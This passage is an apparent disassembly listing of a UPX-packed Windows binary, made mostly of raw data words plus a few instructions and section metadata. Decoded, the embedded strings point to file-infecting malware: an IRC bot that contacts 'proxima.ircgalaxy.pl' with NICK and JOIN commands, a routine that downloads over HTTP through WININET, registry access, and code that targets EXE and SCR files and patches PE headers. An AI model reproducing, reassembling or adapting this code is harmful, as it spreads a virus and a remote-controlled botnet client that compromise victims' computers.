dd 59106AC0h, 5050ABF3h, 50505050h, 95FF5250h, 402433h
dd 208C481h, 74FF0000h, 95FF0824h, 4024D7h, 0D795FF53h
dd 5D004024h, 800004C2h, 1750A3Eh, 888D8B46h, 0E3004014h
dd 958D19h, 3004010h, 0D2FF56D1h, 880FC084h, 11Fh, 110840Fh
dd 3E800000h, 4610753Ah, 0F003E80h, 10184h, 203E8000h
dd 8146F175h, 4E49503Eh, 8B427547h, 146C6CFh, 51CE2B4Fh
dd 5651006Ah, 0CF95FF53h, 59004024h, 850FC13Bh, 0DFh, 1C36858Dh
dd 6A0040h, 0C68h, 0FF535000h, 4024CF95h, 0C3D00h, 850F0000h
dd 0BFh, 0B1E9h, 503E8100h, 0F564952h, 0A585h, 8C68300h
dd 0F0D3CACh, 9984h, 75203C00h, 3A3CACF3h, 8C850Fh, 0DAD0000h
dd 20202020h, 6567213Dh, 0AC7F7574h, 7C75203Ch, 20FF7E81h
dd 75747468h, 37E8171h, 2F2F3A70h, 47C66875h, 310F00FFh
dd 2710BAh, 52E2F700h, 248795FFh, 0C0330040h, 50505050h
dd 9E8h, 776F4400h, 616F6C6Eh, 95FF0064h, 4024DFh, 3674C085h
dd 8589C933h, 402509h, 2006851h, 51518000h, 95FF5056h
dd 4024E3h, 1996958Dh, 33500040h, 505154C9h, 0FF515152h
dd 40243B95h, 24048700h, 240B95FFh, 0C3F80040h, 147B8D80h
dd 0F9010040h, 464F53C3h, 52415754h, 694D5C45h, 736F7263h
dd 5C74666Fh, 646E6957h, 5C73776Fh, 72727543h, 56746E65h
dd 69737265h, 455C6E6Fh, 6F6C7078h, 726572h, 71696E55h
dd 6F486575h, 2007473h, 0F0FF00h, 70000000h, 69786F72h
dd 692E616Dh, 61676372h, 7978616Ch, 6C702Eh, 4B43494Eh
dd 626F6220h, 756D6574h, 53550A73h, 6B205245h, 35303230h
dd 2E203130h, 3A202E20h, 494F4A5Fh, 7626204Eh, 75747269h
dd 0E8550Ah, 5D000000h, 1C48ED81h, 85C60040h, 40147Bh
dd 5F95FF00h, 0C1004024h, 3C741FE8h, 0B58B1E6Ah, 40241Fh
dd 2E3CAC59h, 81662A75h, 751DFF3Eh, 0FFBD8D23h, 8B004024h
dd 0A5570276h, 858DA566h, 402353h, 2379858Fh, 89FA0040h
dd 4E8CFA46h, 1B1FBFEh, 43EBCFE2h, 14A3858Dh, 6A500040h
dd 0FF066A00h, 40246F95h, 247C8300h, 2B750408h, 4E8h, 43465300h
dd 5395FF00h, 0E8004024h, 0FFFFFC4Ch, 7E8h, 43465300h
dd 534F5Fh, 245395FFh, 35E80040h, 0E8FFFFFCh, 0FFFFF447h
dd 12648DFFh, 0BE80040h, 55000000h, 33524553h, 4C442E32h
dd 95FF004Ch, 402467h, 0AE8h, 70737700h, 746E6972h, 50004166h
dd 241795FFh, 85890040h, 402423h, 8D8D310Fh, 40178Dh, 25058589h
dd 0FF510040h, 40246795h, 4689300h, 8D000000h, 40179AB5h
dd 0BD8D5900h, 4024EBh, 0FFF746E8h, 85C766FFh, 401BFAh
dd 0A583F0FFh, 401BFCh, 0BA958D00h, 5000401Bh, 6A016A54h
dd 2685200h, 0FF800000h, 4024EF95h, 5AC08500h, 8D8D2275h
dd 401BEDh, 8D066A52h, 401BFAB5h, 50565400h, 0FF525150h
dd 4024F395h, 95FF5800h, 4024EBh, 270C85C6h, 0E8000040h
dd 0Ch, 434F5357h, 2E32334Bh, 4C4C44h, 246795FFh, 68930040h
dd 7, 16F1B58Dh, 8D590040h, 4024BBBDh, 0F6C1E800h, 0CE8FFFFh
dd 57000000h, 4E494E49h, 442E5445h, 0FF004C4Ch, 40246795h
dd 0FC08500h, 1E784h, 5689300h, 8D000000h, 40172FB5h, 0BD8D5900h
dd 4024D7h, 0FFF68AE8h, 0DBBD83FFh, 4024h, 1C2840Fh, 0EC810000h
dd 190h, 1016854h, 95FF0000h, 4024BBh, 190C481h, 8B500000h
dd 52006AD4h, 24DB95FFh, 0C0850040h, 680D7559h, 1388h
dd 248795FFh, 0E2EB0040h, 1BFCBD83h, 75000040h, 858D29h
dd 5000401Ch, 24C795FFh, 0C0850040h, 13B840Fh, 408B0000h
dd 0FF008B0Ch, 0FC858F30h, 0C600401Bh, 40270C85h, 6A0100h
dd 26A016Ah, 24D395FFh, 0F8830040h, 12840FFFh, 93000001h
dd 1BF8958Dh, 106A0040h, 95FF5352h, 4024C3h, 850FC085h
dd 0F2h, 1C1ABD8Dh, 8B10040h, 0FFFAC0E8h, 9468FFh, 2B5E0000h
dd 243489E6h, 6395FF54h, 8D004024h, 401C28BDh, 0E801B100h
dd 0FFFFFAA1h, 1024448Bh, 0B08E0C1h, 0C1042444h, 440B08E0h
dd 0E8500824h, 5, 78362E25h, 95FF5700h, 402423h, 0C60CC483h
dd 8D200647h, 401C1595h, 68006A00h, 21h, 95FF5352h, 4024CFh
dd 14247C8Dh, 2795FF57h, 0C6004024h, 400A3804h, 5750006Ah
dd 0CF95FF53h, 3004024h, 36BD8DE6h, 6A00401Ch, 0C6800h
dd 53570000h, 24CF95FFh, 0C3D0040h, 75000000h, 0DB58D4Dh
dd 8D004025h, 40270C8Dh, 6ACE2B00h, 53565100h, 24CB95FFh
dd 0F8830040h, 912F7E00h, 0B58DFE8Bh, 40250Dh, 0AEF20DB0h
dd 0E8601075h, 0FFFFFAF7h, 0E3177261h, 1778D09h, 0CF8BEAEBh
dd 0BD8DCE2Bh, 40250Dh, 0F787A4F3h, 0FF53B9EBh, 4024BF95h
dd 7BBD8000h, 1004014h, 30682A74h, 0FF000075h, 40248795h
dd 0CBD8000h, 4027h, 85C71174h, 401BFCh, 0
dd 270C85C6h, 0E9000040h, 0FFFFFE56h, 148485C7h, 40h, 0C25D8000h
dd 0B58D0004h, 40270Dh, 4795FF56h, 83004024h, 840FFFF8h
dd 0BBh, 28118589h, 6A0040h, 7F95FF56h, 85004024h, 0A4840FC0h
dd 2B000000h, 6A5050C0h, 16A5003h, 68h, 95FF56C0h, 40242Bh
dd 0FFFF883h, 2E484h, 15858900h, 8D004028h, 4028198Dh
dd 21958D00h, 51004028h, 50006A52h, 244F95FFh, 0F8830040h
dd 0B2840FFFh, 6A000002h, 15B5FF00h, 0FF004028h, 40244B95h
dd 0FFF88300h, 29B840Fh, 85890000h, 402829h, 0C303C933h
dd 6A515051h, 0B5FF5104h, 402815h, 242F95FFh, 0C0850040h
dd 277840Fh, 0C9330000h, 282D8589h, 51510040h, 1F6851h
dd 0FF50000Fh, 40246B95h, 0FC08500h, 23084h, 31858900h
dd 0C3004028h, 0B8384B8Bh, 583Ch, 0C103D233h, 0E1F7F1F7h
dd 28398589h, 4B8B0040h, 140AB83Ch, 0D2330000h, 0F1F7C103h
dd 8589E1F7h, 402835h, 4BB70FC3h, 36E3F906h, 0F18538Dh
dd 31443B7h, 0C16B49D0h, 81D00328h, 69775F3Ah, 1E74F96Eh
dd 0C7A8349h, 8BDF7201h, 428B3C4Bh, 10420314h, 0FF48448Dh
dd 0C123D9F7h, 2829853Bh, 59C30040h, 0C24448Bh, 0B88889h
dd 0C0330000h, 0EBCF8BC3h, 0DBD8D0Bh, 0FC004027h, 0C933DF8Bh
dd 72613CACh, 777A3C06h, 0AA202C02h, 0EC745C3Ch, 0DD742E3Ch
dd 0E875003Ch, 18BC8E3h, 4558453Dh, 3D0B7400h, 524353h
dd 0FF49850Fh, 38BFFFFh, 4E49573Dh, 3C840F43h, 3DFFFFFFh
dd 4E554357h, 0FF31840Fh, 573DFFFFh, 0F323343h, 0FFFF2684h
dd 53503DFFh, 840F4F54h, 0FFFFFF1Bh, 43E8DB33h, 0FFFFFFEh
dd 0FFFF0E84h, 0E8D233FFh, 16h, 0FFFF6EE8h, 0E8FFh, 815D0000h
dd 4021B7EDh, 0F9E900h, 0FF640000h, 31B58B32h, 64004028h
dd 81662289h, 0F5A4D3Eh, 0E285h, 3C5E8B00h, 8166DE03h
dd 0F45503Bh, 0D285h, 1643F700h, 2000h, 0C5850Fh, 43F60000h
dd 840F025Ch, 0BBh, 20207E81h, 0F202020h, 0AE84h, 0FECFE800h
dd 820FFFFFh, 0A3h, 0FFFE97E8h, 0A2E8FFh, 9D8B0000h, 402835h
dd 0FFFDB5E8h, 88840FFFh, 8B000000h, 402831B5h, 3C5E8B00h
dd 9EE8DE03h, 72FFFFFEh, 244A8176h, 0E0000060h, 356FE8Bh
dd 0B58D147Ah, 401000h, 0B9107A03h, 502h, 0B1A5F357h, 0F302E303h
dd 525E5FA4h, 8D92310Fh, 15787h, 0FF508800h, 0FFEEC9E8h
dd 4A8B5AFFh, 104A030Ch, 2B05418Dh, 47892843h, 2046C713h
dd 20202020h, 8B284B89h, 858B104Ah, 402835h, 73084A39h
dd 84A8903h, 83104201h, 8B005863h, 40283985h, 8420100h
dd 33504301h, 228B64D2h, 58028F64h, 2815BD83h, 0F000040h
dd 0FFFDE284h, 31B5FFFFh, 0FF004028h, 40248B95h, 2DB5FF00h
dd 0FF004028h, 40240B95h, 198D8D00h, 8D004028h, 40282195h
dd 6A525100h, 15B5FF00h, 0FF004028h, 40248395h, 15B5FF00h
dd 0FF004028h, 40240B95h, 0DB58D00h, 0FF004027h, 402811B5h
dd 95FF5600h, 40247Fh, 2815A583h, 0C3000040h, 0E8h, 16A5D00h
dd 2332ED81h, 0F0580040h, 8485C10Fh, 85004014h, 0C883C3C0h
dd 0C10FF0FFh, 40148485h, 103DC300h, 75002A00h, 7C81661Ch
dd 716C0C24h, 0E8601375h, 0FFFFFFC4h, 0C2E80575h, 0E8FFFFFDh
dd 0FFFFFFD2h, 2DFF2E61h, 12345678h, 0FFAAE860h, 3975FFFFh
dd 3024448Bh, 270DB58Dh, 508B0040h, 3A816608h, 25730206h
dd 6856h, 0C48B00FFh, 5052006Ah, 24B795FFh, 0C4830040h
dd 5C3E8108h, 755C3F3Fh, 4C68303h, 0FFFD74E8h, 0FF84E8FFh
dd 0B861FFFFh, 25h, 2FB8C3h, 10E80000h, 0C2000000h, 30B80020h
dd 0E8000000h, 3, 8D0024C2h, 0CD0C2454h, 0F8832Eh, 0E860197Ch
dd 0
; ---------------------------------------------------------------------------
mov edx, [esp+30h]
pop ebp
mov ebx, [edx]
sub ebp, 4023F5h
call sub_31509A8A
popa
retn 4
; ---------------------------------------------------------------------------
dw 7963h
dd 37DE77E7h, 157D77E7h, 0A5FD77F5h, 77E7h, 2 dup(0)
dd 46720000h, 0A83777E7h, 779777E7h, 1BB877E7h, 0AA8377E6h
dd 0AC3777E7h, 0B1E777E7h, 3C4977EBh, 4CAB77E7h, 93EF77E7h
dd 3CE277E7h, 9F9377E7h, 0AF8F77E7h, 0AD3477E6h, 0C48677E6h
dd 0C65777E7h, 5D877E7h, 4D7677E8h, 0C81577E7h, 6B777E7h
dd 0A59577E7h, 0A6E977EBh, 39677EBh, 11A77E7h, 1BE677E7h
dd 509077E6h, 980A77E7h, 9D8C77E7h, 0E46377E7h, 0E60377F7h
dd 0E6A377F7h, 0E6B377F7h, 0EA7377F7h, 0EB6377F7h, 0EC4377F7h
dd 0F50377F7h, 263377F7h, 77F5h, 1A31h dup(0)
UPX2 ends
; Section 4. (virtual address 00011000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00011000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 31511000h
align 2000h
_idata2 ends
end start